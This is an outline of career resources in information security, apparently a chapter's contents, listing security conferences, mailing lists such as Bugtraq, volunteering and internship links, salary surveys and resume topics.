- REcon (Reverse Engineering Convention)
- Black Hat
- Computer Security Foundations Symposium
- Hackers on Planet Earth (HOPE)
- DefCon
- International Cryptology Conference
- USENIX Security Symposium
- European Symposium on Research in Computer Security
- International Symposium on Recent Advances in Intrusion Detection
- ToorCon
- Internet Measurement Conference (IMC)
- Microsoft BlueHat Security Briefings
- Association for Computing Machinery (ACM) Conference on
Computer and Communications Security
- Annual Computer Security Applications Conference
- Chaos Communication Congress
- Local Communities
-
Mailing Lists
- www.Securityfocus.com/archive
- Bugtraq
- Focus-IDS
- INCIDENTS
- Security Basics
- SecurityJobs
-
Putting It All Together
-
Resume
-
Volunteering
- Charities
- www.HackersForCharity.org
- craigslist.org
- Open Source Projects
-
Internships
- www.dhs.gov/student-opportunities
- www.fbi.gov/about-us/otd/internships
- www.cia.gov/careers/student-opportunities/index.html
- www.makingthedifference.org/federalinternships/directory
- Job Listings
-
Salary Surveys
-
Job Position Surveys
- www.Salary.com
- http://www.cisco.com/web/learning/employer_resources/pdfs/2012_salary_rpt.pdf
- Certification Surveys
- Personal Documents